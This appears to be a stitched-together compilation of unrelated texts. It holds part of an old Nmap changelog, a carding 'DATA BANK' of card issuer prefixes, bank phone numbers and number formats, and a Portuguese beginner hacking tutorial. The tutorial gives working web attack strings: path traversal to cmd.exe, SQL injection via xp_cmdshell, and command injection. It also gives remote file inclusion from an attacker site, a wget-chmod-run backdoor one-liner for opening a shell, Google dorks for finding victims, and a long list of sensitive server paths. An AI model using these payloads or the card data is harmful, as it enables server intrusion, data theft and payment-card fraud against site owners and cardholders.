www.windows2000test.com :).

o Changed the machine parseable output of RPC information to include
the version information. If we figured out the RPC info, it is now
provided as "program-num*lowversion-highversion". If we didn't get
the number, but we think the port is RPC, the field simply contains
"R". If we believe the port is NOT RPC, then the field contains
"N". If the field is empty, we did not RPC scan the port. Thanks
to H D Moore (nlog(a)ings.com) for making me aware how much the
earlier machine parseable RPC logging sucked :).

Nmap 2.3-Beta4

o Added direct (non-portmapper) RPC scanning to determine what RPC
program is listening on a particular port. This works for UDP and
TCP ports and is currently implemented using sockets (which means
you can't use decoys, but on the other hand you don't have to be
root). Thanks go to ga (ga(a)capyork.com) for writing sample code
to demonstrate the technique. The RPC services list included with
nmap was compiled by Vik Bajaj (vbajaj(a)sas.upenn.edu) with help
from various members of the nmap-hackers list.

o Fixed a problem that could cause freezes when you scan machines on
at least two different types of interfaces as part of the same
command.

o Identified and found workaround for Linux kernel bug which allows
connect() to sometimes succeed inapropriately when scanning closed
ports on localhost.

o Fixed problems relating to people who specify the same port more
than once on the command line. While the right answer is "well,
don't do that!", I decided to fix nmap to handle this gracefully.

o Tweaked UDP scanning to be more effective against Solaris ICMP error
limiting.

o Fixed strtol() integer overflow problem found by Renaud Deraison
(deraison(a)cvs.nessus.org)

o The HTML translation of the Man page at
http://www.insecure.org/nmap/nmap_manpage.html should now be
complete (man2html was dropping lines before).

o Added a note in the man page that Nmap 2.0+ is believed to be
COMPLETELY Y2K COMPLIANT! I've been getting a lot of letters from
laywers about that recently. You should still be able to port scan
on Jan 1st (well ... as long as you have electricity and gangs of
looting thugs haven't stolen your computers :)

Nmap 2.2-Beta4

o Integrated nmapfe code from Zach Smith to allow the nmapfe output
window to resize when you resize the nmapfe window.

o Integrated patch sent in by Stefan Erben (stefan(a)erben.com) which
allows nmap to recognize and ignore null interfaces. If you were
getting a bogus error like "eth0 not found in /proc/net/route" then
this should solve your problem.

o Applied patch from Alexander Savelyev (fano(a)ham.kiev.ua) which
gives nmap the parameters necessary to support SLIP and PPP on BSDI
systems.

o Upgraded to a new version of shtool (1.2.3)

Nmap 2.2-Beta3

o Adopted Ralf S. Engelschall's excellent shtool script for
simplifying the nmap makefile and making it more portable

o Various other minor changes to nmapfe.

Nmap 2.2-Beta2

o Cleaned up build environment more, fixed up RPM and Makefile.in,
eliminated the automake stuff.

o Added nmapfe feature to show nmap command as you change options

o Changed nmapfe to use a global MyWidgets struct rather than tons of
global vars all over the place.

o Made nmapfe much smarter about rejecting stupid option attempts. It
now tries to correct things when you specify illegal options.

o GTK+ 1.0 compatibility fixes

o Integrated nmapfe changes from Zach

Nmap 2.2-BETA1

o Integrated in nmapfe -- a cool front end wrottem by Zach Smith (matrxweb(a)hotmail.com)

Nmap 2.12

o Changed the way tcp connect() scan determines the results of a
connect() call. Hopefully this will make nmap a little more
portable.

o Got rid of the security warning message for people who are missing
/dev/random and /dev/urandom due to complaints about the warning.
This only silences the warnings -- it still uses relatively weak
random number generation under Solaris and other systems that lack
this functionality.

o Eliminated pow() calls on Linux boxes. I think some sort of glibc
bug was causing nmap to sigsegv in some cases inside of pow(). Most
people weren't affected, but those who were would almost always
SIGSEGV with -O.

o Fixed an rpm problem noted by Mark Smith (marks(a)senet.com.au)

Nmap 2.11

o Many new fingerprints added. I received more than 300 submissions
between this release and the last one.

o Fixed IRIX problems which prevented OS scanning from working on that
platform. The problem was researched and solution found by Lamont
Granquist (lamontg(a)u.washington.edu). You can also thank him for
porting nmap to almost every UNIX around.

o Added support for '-m -' to redirect machine readable logs to stdout
for shell pipelining, etc. I also changed machine readable output
to show service names now that we use a nmap specific services file
rather than /etc/services. These features were suggested by Dan
Farmer. You can also thank him for SATAN (the auditing tool).

o Fixed a link-list bug that could cause hangs in UDP,FIN,NULL, and
XMAS scans. Also fixed a ptr problem that could cause SIGSEGV.
These problem were discovered and tracked down by Ben Laurie
(ben(a)algroup.co.uk). You can also thank him for Apache, OpenSSL,
and Apache-SSL.

o Fixed installation problem for people without a /usr/local/man/man1
directory. Found by Jeffrey Robertson (a-jeffro(a)microsoft.com).
I guess you can thank him for Win98 ;).

o Several other little fixes to the installation script and minor
scanner tweaks.

Nmap 2.10

o Private test release

Nmap 2.09

o Private test release

Nmap 2.08

o Bugfix for problem that can cause nmap to appear to "freeze up" for
long periods of time when run on some busy networks. (found by
Lamont Granquist)

Nmap 2.07

o Fixed a lockup on Solaris (and perhaps other proprietary UNIX
systems) caused by a lack of /dev/random & /dev/urandom and a rand()
that only returns values up to 65535. Users of Free operating
systems like Linux, FreeBSD, or OpenBSD probably shouldn't bother
upgrading.

Nmap 2.06

o Fixed compile problems on machines which lack snprintf() (found by
Ken Williams (jkwilli2(a)unity.ncsu.edu))

o Added the squid proxy to nmap-services (suggested by Holger Heimann)

o Fixed a problem where the new memory allocation system was handing
out misaligned pointers.

o Fixed another memory allocation bug which probably doesn't cause any
real-life problems.

o Made nmap look in more places for nmap-os-fingerprints

Nmap 2.05

o Tons of new fingerprints. The number has grown by more than 25%.
In particular, Charles M. Hannum (root(a)ihack.net) fixed several
problems with NetBSD that made it easy to fingerprint and he sent me
a huge new batch of fingerprints for various NetBSD releases down to
1.2. Other people sent NetBSD fingerprints down to 1.0. I finally
got some early Linux fingerprints in (down to 1.09).

o Nmap now comes with its own nmap-services which I created by merging
the /etc/services from a bunch of OS' and then adding Netbus, Back
Orifice, etc.

o Random number generation now takes advantage of the /dev/urandom or
/dev/random that most Free operating systems offer.

o Increased the maximum number of OS guesses nmap will make, told nmap
never to give you two matches where the OS names are byte-to-byte
equivalent. Fixed nmap to differentiate between "no OS matches
found" and "too many OS matches to list".

o Fixed an information leak in the packet TTL values (found by HD
Moore (hdmoore(a)usa.net))

o Fixed the problem noted by Savva Uspensky about offsets used for
various operating systems' PPP/SLIP headers. Due to lack of
responses regarding other operating systems, I have made assumptions
about what works for BSDI, NetBSD, and SOLARIS. If this version no
longer works on your modem, please let me know (and tell me whether
you are using SLIP/PPP and what OS you are running).

o Machine parseable logs are now more machine parseable (I now use a
tab to seperate test result fields rather than the more ambiguous
spaces. This may break a few things which rely on the old format.
Sorry. They should be easy to fix.

o Added my nmap-fingerprintinting-article.txt to the distribution in
the docs directory.

o Fixed problem where nmap -sS (my_ethernet_or_ppp_ip_address) would
not correctly scan localhost (due to the kernel rerouting the
traffic through localhost). Nmap should now detect and work around
this behavior.

o Applied patch sent to my by Bill Fenner (fenner(a)parc.xerox.com)
which fixes various SunOS compatibility problems.

o Changed the makefile 'all' target to use install-sh rather than
mkdir -p (doesn't work on some systems)

o Documentation updated and clarified slightly.

o Added this CHANGELOG file to the distribution.

DATA BANK

##########################################################################
Tutorial : DATA BANK
By : bLaCk-iBaNk
Posted : 29 sept 2000
##########################################################################

4xxx VISA
5xxx MASTERCARD
6xxx DISCOVER
37xx AMERICAN EXPRESS

Issuing Bank Name Prefix Interbank # Phone #
-------------------------- -------- ------------ -------------------
AT&T Universal Card 4000 N/A 800-852-8880
Security Bank and Trust 4000 N/A ???-???-????
Citibank 4013
Bank of America 4019 N/A 800-622-0789
Bank of America 4024 N/A 800-622-0789
First Cincinatti 4052 N/A ???-???-????
Navy Fed. Credit Union 4060 N/A 800-336-3333
Security Pacific 4071 N/A 213-763-6400
Bank of America 4085 N/A 800-622-0789
Cal. 1rst Union Bank 4085 N/A 800-230-4922
American Savings and Loan 4090 N/A ???-???-????
Westside Auto Empl. Fed. 4094 N/A 313-???-????
Manny Hanny(mass+8+6483355) 4102 N/A 800-648-9911
Atlantic Financial 4121 N/A 800-556-5678
USAA Federal Savings 4121 N/A 800-922-9092
Union Trust 4122
Citibank Classic 4128 N/A 800-843-0777
State Street Bank 4131 N/A ???-???-????
1rst Interstate 4168 N/A ???-???-????
Great America 1st Sav. 4168 N/A 213-???-????
Bank One of Columbus 4168 N/A ???-???-????
Norwest Banks 4205 N/A ???-???-????
Marine Midland 4215 N/A 800-435-4350
Chase Manhattan 4225 N/A 800-842-8403
Chase Lincoln First Classic 4231 N/A 800-242-7325
Chase Lincoln First Classic 4232 N/A 800-242-7325
American Savings and Loan 4233 N/A 804-???-????
Core State 4239 N/A ???-???-????
Nat. Westminster Bank 4241 N/A 800-527-0086
First Chicago Bank 4250 N/A 312-???-????
Consumers Edge 4253
Security First 4254
`irst Omni 4262 N/A 619-???-????
Great Western 4262 N/A 213-???-????
Citibank Prefered 4271 N/A 800-843-0777
First Union of Florida 4301 N/A 305-???-????
HHBC 4302 N/A 408-???-????
VNB 4302 N/A ???-???-????
Irvine Bank 4302 N/A 714-???-????
HHB 4303 N/A ???-???-????
Imperial Savings 4310 N/A 213-???-????
Manufacture Hanover Trust 4310 N/A ???-???-????
Security Pacific 4313 N/A 800-553-7762
Gold Dome 4317 N/A 800-334-1601
Cal. Fed. Sav./Loan 4317 N/A 213-???-????
First Atlanta 4327
North Carolina Nat. 4356 N/A ???-???-????
West Side Auto Union 4369 N/A 313-???-????
Bank One of Dayton 4384 N/A ???-???-????
Bank One of N.Y. 4387 N/A 800-942-1977
Bank One of Columbus 4387 N/A ???-???-????
Unisys Fed. Cred. Union 4388 N/A ???-???-????
Sumitomo Bank 4408 N/A 818-912-2501
Cal. First Interstate 4411 N/A 714-980-3509
Melon Bank of Delaware 4417 N/A 302-995-5769
Cal. First Interstate 4418 N/A 714-980-3509
Bank of Hoven 4428 N/A ???-???-????
Citibank 4428 N/A 800-843-0777
1st Interstate 4428 N/A ???-???-????
Western Savings Az. 4429 N/A 602-???-????
Merrill Lynch Bank & Trust 4443 N/A ???-???-????
FootHill Independent 4444 N/A ???-???-????
AmeriTrust 4447
Citibank Maryland Nat. 4500 N/A ???-???-????
G.M.A.C. Fed. Cred. union 4577 N/A 313-???-????
L.A. Fed. Cred. Union 4654 N/A 213-???-????
First Bankcard 4673 N/A ???-???-????
Milage Plus United 4673 N/A ???-???-????
Wells Fargo 4726 N/A 800-642-4720
TRW Sys. Fed. Credit Union 4735 N/A ???-???-????
AT&T's Universal Card 4783
Bank of Hawaii 4811 N/A ???-???-????
San Bernd. County Cent. CU 4820 N/A 714-???-????
U.S. Bank 4833
GE Capitol 4841 N/A ???-???-????
GE Capitol 4880 N/A ???-???-????
Village Bank of Cincinatti 4897 N/A ???-???-????
Citizen's Bank 4911 N/A 800-645-7420

Issuing Bank Name Prefix Interbank # Phone #
-------------------------- -------- ------------ -------------------
Associates Financial Corp 5050 ???? ???-???-????
Wells Fargo 5121 1065 800-642-4720
Bank of Montreal 5191 ???? 416-???-????
Bank of LA. 5127 ???? 504-???-????
Guardian Trust of Canada 5140 ???? 416-???-????
Feather River State Bank 5146 ???? ???-???-????
Security Pacific 5204 1006 800-553-7762
Chemical 5211 1263 ???-???-????
San Diego 1rst Interstate 5212 4732 619-???-????
First Trust Bank 5213 ???? 714-983-0511
Torrance Savings 5215 ???? ???-???-????
Marine Midland 5215 6207 800-435-4350
Manufacturer's Hanover Trust 5217 1033 ???/???-????
Golden Pacific Bank 5220 1225 714-983-4600
Bank of California 5221 1346 818-965-0881
Vineyard National Bank 5225 ???? 800-241-0177
Upland Bank 5226 2861 714-946-2265
Rancho Bank 5227 3224 818-915-1966
Coldwell First Interstate 5228 ???? ???-???-????
1rst Nat. Sav. Bank 5230 6531 714-982-4016
Hunington Bank 5233 1226 ???-???-????
Guardian Trust of Canada 5240 ???? 416-???-????
Virginia Nat. Bank 5241 4630 804-???-????
Chevy Chase Fed. Savings 5242 1667 800-553-1401
Bank of America 5254 1154 800-622-0789
Chemical 5263 1263 ???-???-????
First Interstate of Neb. 5264 ???? ???-???-????
Security Pacific 5270 2742 800-553-7762
Atlantic Financial 5271 4121 800-556-5678
Bank of Amer. MC Gold 5273 1154 800-622-0789
First Interstate 5277 1352 ???-???-????
Wells Fargo 5282 1065 800-642-4720
Chase Lincoln First 5286 ???? 800-242-7325
Village National Bank 5287 ???? ???-???-????
Norwest 5317 6209 800-284-0322
West Savings Az. 5320 4429 602-???-????
Bank of N.Y. 5323 3754 800-942-1977
Western Financial Savings 5329 ???? 800-635-0581
Maryland Bank National 5329 6017 800-421-2110
Citibank Prefered 5410 1035 800-843-0777
Wells Fargo (West) 5410 1065 800-642-4720
Citibank Prefered 5410 6785 ???-???-????
First Finland Bk of Omaha 5411 ???? ???-???-????
First Bankcard 5411 1286 ???-???-????
Sanwa Bank of Cal. 5413 ???? 714-627-7601
Nat. Westmister Bank 5414 ???? 800-527-0086
Key Federal 5414 ???? ???-???-????
Nothrup Credit Union 5415 ???? ???-???-????
Colonial Nat. Bank 5415 ???? 800-544-8205
HouseHold Bank of Cal. 5416 ???? 408-???-????
USAA Fed. Savings Bank 5416 1665 800-922-2092
Bank of N.Y. 5417 3754 800-942-1977
Sacremento Savings and Loan 5418 5310 ???-???-????
First Interstate 5419 ???? ???-???-????
Bank One of Northern Cal. 5419 ???? 209-996-3500
Bank of Hoven 5419 1933 ???-???-????
Colonial National Bank 5420 ???? 800-544-8205
Hughes Emp. Fed. Union 5423 ???? ???-???-????
Citibank Classic 5424 1065 ???-???-????
Citibank 5424 1067 800-843-0777
Bank of N.Y. 5432 3754 800-942-1977
Chase Manhattan 5465 1665 800-842-8403
5110 Universal Travel Voucher
5130 Eurocard France
5150 Credit Systems, Inc.
5172 First Bank Card Center
5190 Bank of Montreal
5201 Mellon Bank, N.A
5211 Chemical Bank Delaware
5212 F.C.C National Bank
5217 Union Trust
5223 Trustmark National Bank
5224 Midland Bank
5226 Eurocard Ab

Discover 6013 MNBA

1-800-DISCOVER or 1-800-347-2683

American Express (Prefixes)

Prefixes- Type-

3710 3712 3731 Green 800-528-4800/292-AMEX
3718 3728 Gold 800-327-2177/445-7989
3728 Platinum
3737 Optima 800-635-5955
3787 3782 Corporate

BANK CARD FORMATS

CARD NUMBERING FORMATS ARE ACCORDING TO THIS SCHEDULE: "*4-*5" MEANS A
9 DIGIT NUMBER IN A GROUP OF 4, THEN 5. "5XXX-*5" MEANS THE SAME THING,
EXCEPT THAT THE FIRST DIGIT OF THE 4 NUMBER GROUP IS ALWAYS A "5", ETS.
WHEN "5230-8888-*4-*4" TYPE IS SHOWN, "5230-8888-" MEANS THAT THE FIRST 8 DIGITS
ARE AS SHOWN, FOLLOWED BY TWO GROUPS OF 4 DIGITS, ETC. BY KNOWING THIS
FORMAT, YOU COULD UNDERSTAND WHAT YOUR CREDIT CARD NUMBERS MEAN, AND HOW
VARIOUS MAIL ORDER AND TOUCHTONE PHONE SERVICES DETERMINE IF THE CARD
NUMBER GIVEN TO THEM IS REAL. WON'T YOU SLEEP BETTER AT NIGHT KNOWING HOW
THE BANKS NUMBER THEIR CARDS, AND HOW THEIR AUTHENTICITY IS CHECKED :)

BANK OF AMERICA
M: 5XXX-*4-*4-*4
V: 4XXX-*4-*4-*4

CHEMICAL BANK OF NY
M: 5211-*4-*4-*4
V: 4211-*4-*4-*4

COMPUTER COMMUNICATIONS
M: 518X-*4-*4-*4
V: 4XXX-*4-*4-*4

HARRIS TRUST AND SAVINGS
M: 5230-8888-*4-*4
V: 4681-2XX-*3-*3

CITIBANK OR CITICORP
M: 5218-*4-*4-*4
M: 5424-18XX-*4-*4
V: 4128-*3-*3-*3
V: 4271-38XX-*4-*4

CONNECTICUT NATL BANK
M: 5272-*4-*4-*4
V: 4040-*3-*3-*3

CHASE MANHATTAN BANK
M: 5464-*4-*4-*4
V: 4225-*3-*3-*3
V: 4226-*3-*3-*3

CROCKER NATL BANK
M: 5282-*4-*4-*4
V: 4040-*3-*3-*3

##########################################################################

Ataques via Strings

Ataques via Strings
Por f0ul @ hax0rslab.org
Data: 26-10-2003

1 - Intro
2 - Strings Comuns
3 - Montando sua String
4 - Prokurando sites Vul.
5 - Abrindo Shell e Pegando Root
5 - Bonus[surpresa] ;)
6 - Nao seja um SC
7 - Terminando

-------------------------------------------------------------------------------------
1 - Introducao:

Olá, aki estou eu, com a prazerosa missao de lhes passar um pouco mais de
conhecimento, o assunto de qual irei falar hoje aki, nao tem nada de muito especial,
eh beeeem simples e basico,

C vc for hacker, nao precisa nem ler... pois estou escrevendo este txt para os
fucadores que estao se iniciando no hacking, e o assunto que falarei aki eh de
grande importacia... "as vezes" lol

Ahh eu tbm queria pedir desculpas, pois jah fazia um tempo que eu nao escrevia mais nada
sobre hacking, estive ocupadissimo com trabalhos (da vida real) mas agora ja estou
mais folgado, entao vou comecar escrever uns textos legais para vcs ;)...

Vou comecar por este aki, um texto bem simples que vai mostrar as diversas
maneiras(nao todas) de c atacar um site via browser... nao falarei sobre programacao,
ou coisas mais avancadas, pois irei direto ao ponto... ;)

Boa Leitura ;)

Para quem nao sabe a porta 80, eh a porta padrao dos websites, e nesta porta
nos podemos encontrar muitos bugzinhos de seguranca, taiz bugzinhos q quando
explorados por alguem mal intencionado, pode resultar em acesso remoto!
Geralmente esse acesso remoto eh com permissoes restritas, mas dependendo da
falha q o atacante explorou, ele podera ter obtido permissao total ao servidor...
Ou seja, ele podera fazer tudo oque lhe der na telha!! lol

Esta tecnica pode ser chamada de "FingerPrinting" ou "Ataques a porta 80" , eu
particularmente e tbm mais pessoas por ai chamamos de "Ataque via String",
Nao importa qual o sistema operacional esta rodando por tras do website,
esta tecnica eh aplicavel em qquer website que estiver rodando cgi, php, asp e
outras linguagens q tiverem bugZ...

-------------------------------------------------------------------------------------
2 - Strings Comuns:

Eu darei agora alguns exemplos comuns de strings que poderam ser usadas
para explorar web-sites e conseguir acesso remoto, eu nao pretendo mostrar TODAS
as formas possiveis de uma string, mas tentarei mostrar as mais usadas, para
que assim vc possa montar suas proprias strings no futuro, usando apenas do
conhecimento adquirido aki + sua imaginacao... lol ;)

Junto da string darei uma breve descricao da msm e como usa-la em um ataque.

Abaixo os exemplos:

Exemplo 1:

> http://host/index.asp?something=..\..\..\..\WINNT\system32\cmd.exe?/c+DIR+e:\WINNT\*.txt

" * " -> O asteristico muitas vezes eh usado pelo atacante somente como um
simples argumento do comando!

A string acima simplesmente listou todos os arquivos .txt que tinham no diretorio e:\WINNTstring geralmente usada para achar arquivos de logs ou qquer outro arquivo importante
no servidor win invadido. (win eh coisa de lame) esqueca essa parte... hehe

http://host/blah.pl?somethingelse=ls%20*.txt

Essa string tbm listou todos os arquivos .txt mas em um sistema UNIX. (unix eh coisa de haxo)

Exemplo 2:

> http://host/cgi-bin/file.asp?name=john`;EXEC master.dbo.xp_cmdshell'cmd.exe dir c:'--

" ' " -> Quem mexe com SQL Injection deve conhecer este caracter, eh um caracter
particular do SQL, muitos programas por ai foram escritos de forma errada, por
alguem de pouco conhecimento em programacao/security e por falta do conhecimente
do programador, foi deixado furos no programa, sendo assim possivel um atacante
inserir comandos SQL em seu script, e c isso realmente acontecer e o Administrator do
server tiver rodado o SQL como root no unix... entao o atacante tera conseguido obter
acesso total ao server(root), ou as senhas do server, ou sei la oque, hehe isso depende
muito do conhecimento e da imaginacao do atacante. ;)

No caso do exemplo acima foi executado o cmd.exe em uma maquina winNT. Com isso
o atacante podera ter controle remoto da maquina, podera adicionar usuarios, fazer
uploads, downlods, roubar senhas e oque mais ele quizer!

Para mais informacoes sobre SQL Injection, va ateh o site do google e prokure por
"Sql Injection" ;) e c depois de prokurar, nao encontrar MSM, vc podera me mandar uns
e-mail's ;)

Exemplo 3:

> http://site/scripts/root.exe?/c+dir+c:
" + " -> Algumas vezes o (+) eh usado como um espaco em branco similiar ao "%20"
esse caracter (+) quando usado em um ataque, quase sempre junto com o
cmd.exe ou cmd.php, assim vc podera usar o (+) para ajudar na construcao de strings.

Neste exemplo foi mostrado uma string trabalhando com uma backdoor chamada
root.exe, essa backdoor eh geralmente instalada pelo sadmind/ISS Worm, code red, ninda

Se quizer saber mais Informacoes sobre essa string, olhe: www.cert.org/incident_notes/IN-2001-09.html

Exemplo 4:

> /cgi-sys/guestbook.cgi?user=cpanel&template=|id;uname;ls;|

" ; " -> O ; eh muito usado para que vc possa dar diversos comandos ao msm tempo.. duh! ;)

Neste exemplo ai, aproveitando de uma vul no cpanel, eu estou dando um id + um uname
e mais um ls, juntos na msm string.. viram q facil.. uaehahuea
agora imagine algo mais LEGAL, vc poderia puxar, compilar e rodar uma backdoor com um soh comando..

Exemplo 5:

> http://www.host.com/index.php?file=http://www.sitedohaxo.net/script.txt?&cmd=uname

Essa sem duvida eh a string maaais usada hoje em dia pelo povo (kid), ela existe a muito
tempo e ateh hoje vc podera encontrar site vul com ela.. lol isso eh uma vergonha ;(

Bom, ela eh bem simples e vc ja deve ter sakado oq ela faz, ela executa no server o
comando que vc por depois do cmd= que neste caso executo um "uname", pra ela funfa,
vc precisa ter um site na net, e ter o arquivo script.txt q contem dentro;

system($cmd);
?>

e fazer = ao exemplo ali de cima.. ;)

-------------------------------------------------------------------------------------
3 - Montando sua String

Bom, para um fucador, vc deve saber que TODO o santo dia sai uma nova vulnerabilidade,
eh soh vc olhar no site securityfocus.net que vc encontra, vul de php, cgi, asp, sql, etc

Apartir de muitas delas vc podera montar uma string pra explorar a vul apartir do seu
browser msm, simples, facil e rapidu...

Vc pode usar da imaginacao tbm....
vamos pegar o exemplo de uma falha/string ja conhecida no under.

> http://www.host.com/index.php?file=http://www.sitedohaxo.net/script.txt?&cmd=uname

Ta ai a string certinha como eh o certo usar... mas agora imagine que vc possa mudar
ela um pouco, para que assim possa achar mais sites vul a ela,

Vamos mudar ela:

> http://www.host.com/index.php?page=http://www.sitedohaxo.net/script.txt?&cmd=uname

Viram, mudei o "file" por "page"
agora c for fazer uma busca(explicarei como fazer buscas depois) encontrara muitos
mais sites para explorar, e a funcionalidade dela ficou = , vc podera ir mudando ela
por mais coisas, por ex. pg,goto,pagina e etc.. fazendo isso aumenta a possibilidade
de vc encontrar host vulneraveis ;)

-------------------------------------------------------------------------------------
4 - Prokurando sites Vul.

Para prokurar sites vul eh muito facil, a internet eh cheia de ferramentas para isso,
uma delas, e digamos de passagem muuito poderosa, eh o site www.google.com onde permite
ao visitante fazer uma busca completa pela internet!

Vejamos um exemplo pratico, vamos usar uma string que eh muito usado hj em dia... lol

> http://www.host.com/index.php?page=http://www.sitedohaxo.net/script.txt?&cmd=uname

Va ateh o google.com e em search digite:

allinurl: *.php?page=
ou
allinurl: *.php?pagina=
ou
allinurl: *.php?file=
ou qquer outra coisa, use da sua imaginacao ;) viram como eh facil...

-------------------------------------------------------------------------------------
5 - Abrindo Shell e Pegando Root

Bom, chegamos ateh q em fim a parte mais legaL do txt ;)
Para vc abrir uma shell atraves do browser vc irar precisar de:

1 - Uma string boa,
2 - Um site vul a string, duh! haueha
3 - Uma backdoor legalzinhA
4 - Um Xpl local bom

Essas sao as 4 coisas basicas que vc ira precisar.. e agora vejam como eh facil...

Tendo em maos a string e o site vul faca:

>http://www.hostvul.com/index.php?page=http://www.sitedohaxo.net/script.txt?&cmd=cd /tmp;wget www.teusite.com/bd;chmod 777 bd;./bd

PRONTO.... ;)

Viram, em um comando vcs provavelmente abriram uma shell...
vamos intender oq essa string fez:

cd /tmp > Entrou no dir /tmp que eh o dir temp do unix
wget www.teusite.com/bd > Fez o upload da sua backdoor
chmod 777 bd > Tornou a backdoor executavel pra vc
./bd > Rodou a backdoor

Agora vc deve entrar por telnet na porta que sua backdoor abriu...
pegar seus xpls locais e roda-los.. ;)

Depois fucar e fucar.. lol

E era isso, agora vc deve adaptar a string conforme vc precise ;)

-------------------------------------------------------------------------------------
5 - Bonus[surpresa] ;)

EEEEeeeeeeeeeeeeee
Finalmente o bonus.. hehe
Ahh num eh nada de mais, eu soh fiz fogueira.. uaheuah
Soh vou posta aki quase todas strings que conheco e que o povo usa adoidado.

BOM PROVEITO, USE AS COM SABEDORIA.. LOL

/....../all
/....../config.sys
/....../etc/hosts
/../../../../all
/../../../../../../../boot.ini
/../../../../../winnt/repair/sam._
/../../../../config.sys
/../../../../etc/hosts
/.access
/.bash_history
/.htaccess
/.html/............./config.sys
/.htpasswd
/.passwd
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/Admin_files/order.log
/AdvWorks/equipment/catalog_type.asp
/Orders/order.log
/PDG_Cart/order.log
/PDG_Cart/shopper.conf
/PSUser/PSCOErrPage.htm
/WebShop/logs/cc.txt
/WebShop/logs/ck.log
/WebShop/templates/cc.txt
/_private
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/fpcount.exe
/_vti_inf.html
/_vti_pvt
/_vti_pvt/administrators.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/service.pwd
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/_vti_pvt/users.pwd
/adsamples/config/site.csc
/bin
/carbo.dll
/ccbill/secure/ccbill.log
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm
/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/viewexample.cfm
/cgi
/cgi-bin
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/Admin_files/order.log
/cgi-bin/AnyForm2
/cgi-bin/Cgitest.exe
/cgi-bin/Count.cgi
/cgi-bin/FormHandler.cgi
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/UltraBoard.cgi
/cgi-bin/UltraBoard.pl
/cgi-bin/add_ftp.cgi
/cgi-bin/adp
/cgi-bin/adpassword.txt
/cgi-bin/ads.setup
/cgi-bin/aglimpse
/cgi-bin/alibaba.pl
/cgi-bin/allmanage.pl
/cgi-bin/allmanage/adp
/cgi-bin/allmanage/k
/cgi-bin/allmanage/settings.cfg
/cgi-bin/allmanage/userfile.dat
/cgi-bin/allmanageup.pl
/cgi-bin/anyboard.cgi
/cgi-bin/architext_query.pl
/cgi-bin/authorize/dbmfiles/users
/cgi-bin/ax-admin.cgi
/cgi-bin/ax.cgi
/cgi-bin/bigconf.cgiall
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bnbform.cgi
/cgi-bin/cachemgr.cgi
/cgi-bin/calender.pl
/cgi-bin/calender_admin.pl
/cgi-bin/campas
/cgi-bin/cart.pl
/cgi-bin/cgiwrap
/cgi-bin/classifieds.cgi
/cgi-bin/clickresponder.pl
/cgi-bin/cmd.exe
/cgi-bin/counterfiglet
/cgi-bin/dbmlparser.exe
/cgi-bin/dig.cgi
/cgi-bin/dnewsweb
/cgi-bin/edit.pl
/cgi-bin/environ.cgi
/cgi-bin/excite
/cgi-bin/faxsurvey
/cgi-bin/filemail.pl
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/finger.pl
/cgi-bin/formmail.pl
/cgi-bin/fpcount.exe
/cgi-bin/fpexplore.exe
/cgi-bin/gH.cgi
/cgi-bin/get32.exe
/cgi-bin/glimpse
/cgi-bin/guestbook.cgi
/cgi-bin/handler
/cgi-bin/htimage.exe
/cgi-bin/htmlscript
/cgi-bin/htsearch
/cgi-bin/iisadmpwd/achg.htr
/cgi-bin/iisadmpwd/aexp.htr
/cgi-bin/iisadmpwd/aexp2.htr
/cgi-bin/iisadmpwd/anot.htr
/cgi-bin/imagemap.exe
/cgi-bin/info2www
/cgi-bin/infosrch.cgi
/cgi-bin/input.bat
/cgi-bin/input2.bat
/cgi-bin/jj
/cgi-bin/k
/cgi-bin/loadpage.cgi
/cgi-bin/mailform.exe
/cgi-bin/maillist.pl
/cgi-bin/makechanges/easysteps/easysteps.pl
/cgi-bin/man.sh
/cgi-bin/netstat
/cgi-bin/nph-publish
/cgi-bin/nph-test-cgi
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/perl.exe
/cgi-bin/perlshop.cgi
/cgi-bin/pfdispaly.cgi
/cgi-bin/pfdisplay
/cgi-bin/pfdisplay.cgi
/cgi-bin/phf
/cgi-bin/php.cgi
/cgi-bin/plusmail
/cgi-bin/postcard.pl
/cgi-bin/printenv
/cgi-bin/process_bug.cgi
/cgi-bin/query
/cgi-bin/responder
/cgi-bin/rguest.exe
/cgi-bin/rpm_query
/cgi-bin/rwwwshell.pl
/cgi-bin/search.cgi
/cgi-bin/settings.cfg
/cgi-bin/sojourn
/cgi-bin/survey.cgi
/cgi-bin/test-cgi
/cgi-bin/test.bat
/cgi-bin/textcounter.pl
/cgi-bin/tpgnrock
/cgi-bin/tst.bat
/cgi-bin/unlg1.1
/cgi-bin/unlg1.2
/cgi-bin/userfile.dat
/cgi-bin/view-source
/cgi-bin/visadmin.exe
/cgi-bin/w3-msql/
/cgi-bin/webbbs.cgi
/cgi-bin/webdist.cgi
/cgi-bin/webplus
/cgi-bin/websendmail
/cgi-bin/webwho.pl
/cgi-bin/wguest.exe
/cgi-bin/whois_raw.cgi
/cgi-bin/windmail.exe
/cgi-bin/wrap
/cgi-bin/www-sql
/cgi-bin/wwwadmin.pl
/cgi-bin/wwwboard.pl
/cgi-dos/args.bat
/cgi-dos/args.cmd
/cgi-local
/cgi-shl/win-c-sample.exe
/cgi-src
/cgi-src/phf.c
/cgi-win
/cgi-win/uploader.exe
/cgibin
/com1
/com2
/com3
/com4
/con/con
/config/checks.txt
/config/import.txt
/config/mountain.cfg
/config/orders.txt
/default.asp.
/default.asp::$DATA
/doc
/iisadmpwd/aexp2.htr
/iishelp/iis/misc/iirturnh.htw
/iissamples/exair/howitworks/codebrws.asp
/iissamples/exair/search/advsearch.asp
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iissamples/iissamples/query.asp
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/sdk/asp/docs/codebrws.asp
/log
/logs
/mall_log_files/order.log
/manage/cgi/cgiproc
